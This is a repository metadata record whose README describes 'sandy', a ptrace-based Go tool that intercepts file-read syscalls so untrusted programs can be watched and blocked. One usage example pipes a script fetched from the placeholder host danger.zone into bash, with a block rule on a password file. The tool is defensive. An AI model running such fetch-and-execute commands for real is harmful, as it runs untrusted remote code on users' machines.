{"id":13630581,"url":"https://github.com/craigmulligan/sandy","last_synced_at":"2025-04-17T17:31:27.254Z","repository":{"id":93937585,"uuid":"232180448","full_name":"craigmulligan/sandy","owner":"craigmulligan","description":"A tiny \"sandbox\" to run untrusted code 🏖️","archived":true,"fork":false,"pushed_at":"2020-01-19T10:43:45.000Z","size":6302,"stargazers_count":338,"open_issues_count":3,"forks_count":7,"subscribers_count":5,"default_branch":"master","last_synced_at":"2025-04-15T00:03:48.197Z","etag":null,"topics":["cli","golang","ptrace"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/craigmulligan.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2020-01-06T20:32:30.000Z","updated_at":"2025-03-13T08:11:25.000Z","dependencies_parsed_at":"2023-05-11T14:30:54.235Z","dependency_job_id":null,"html_url":"https://github.com/craigmulligan/sandy","commit_stats":null,"previous_names":["hobochild/sandy"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/craigmulligan%2Fsandy","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/craigmulligan%2Fsandy/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/craigmulligan%2Fsandy/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/craigmulligan%2Fsandy/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/craigmulligan","download_url":"https://codeload.github.com/craigmulligan/sandy/tar.gz/refs/heads/mast
er","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":249359981,"owners_count":21257143,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cli","golang","ptrace"],"created_at":"2024-08-01T22:01:47.907Z","updated_at":"2025-04-17T17:31:27.008Z","avatar_url":"https://github.com/craigmulligan.png","language":"Go","funding_links":[],"categories":["Go"],"sub_categories":[],"readme":"# Sandy\n\n\u003e A tiny sandbox to run untrusted code. 🏖️\n\nSandy uses Ptrace to hook into READ syscalls, giving you the option to accept or deny syscalls before they are executed.\n\n**WARNING**: While sandy is able to intercept READ syscalls there are a variety of ways to get around this. Full details can be found in the [hackernews thread](https://news.ycombinator.com/item?id=22025986). 
Some of these can be patched to catch simple attacks, but you should use sandy with the expectation that it is better than nothing, but it is not true isolation.\n\n## Usage\n\n```\nUsage of ./sandy:\n\n  sandy [FLAGS] command\n\n  flags:\n    -h\tPrint Usage.\n    -n value\n        A glob pattern for automatically blocking file reads.\n    -y value\n        A glob pattern for automatically allowing file reads.\n```\n\n## Use cases\n\n### You want to install anything\n\n```shell\n\u003e sandy -n \"/etc/password.txt\" npm install sketchy-module\n\n  BLOCKED READ on /etc/password.txt\n```\n\n```shell\n\u003e sandy -n \"/etc/password.txt\" bash \u003c(curl  https://danger.zone/install.sh)\n\n  BLOCKED READ on /etc/password.txt\n```\n\n### You are interested in what file reads your favourite program makes.\n\nSure, you could use strace, but it references file descriptors; sandy makes this much easier at a glance by printing the absolute path of the fd.\n\n```\n\u003e sandy ls\nWanting to READ /usr/lib/x86_64-linux-gnu/libselinux.so.1 [y/n]\n```\n\n### You _don't_ want to buy your friends beer\n\nA friend at work knows that you are security conscious and that you keep a `/free-beer.bounty` file in your home directory. With the promise of a round of drinks and office-wide humiliation, Dave tries to trick you with a malicious script under the guise of being a helpful colleague.\n\nYou run their script with sandy and catch him red-handed.\n\n```shell\n\u003e sandy -n \"*.bounty\" bash ./dickhead-daves-script.sh\n\n  BLOCKED READ on /free-beer.bounty\n```\n\n**NOTE**: It's definitely a better idea to encrypt all your sensitive data; sandy should probably only be used when that is inconvenient or impractical.\n\n**NOTE**: I haven't made any effort for cross-x compatibility so it currently only works on Linux. 
I'd happily accept patches to improve portability.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcraigmulligan%2Fsandy","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcraigmulligan%2Fsandy","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcraigmulligan%2Fsandy/lists"}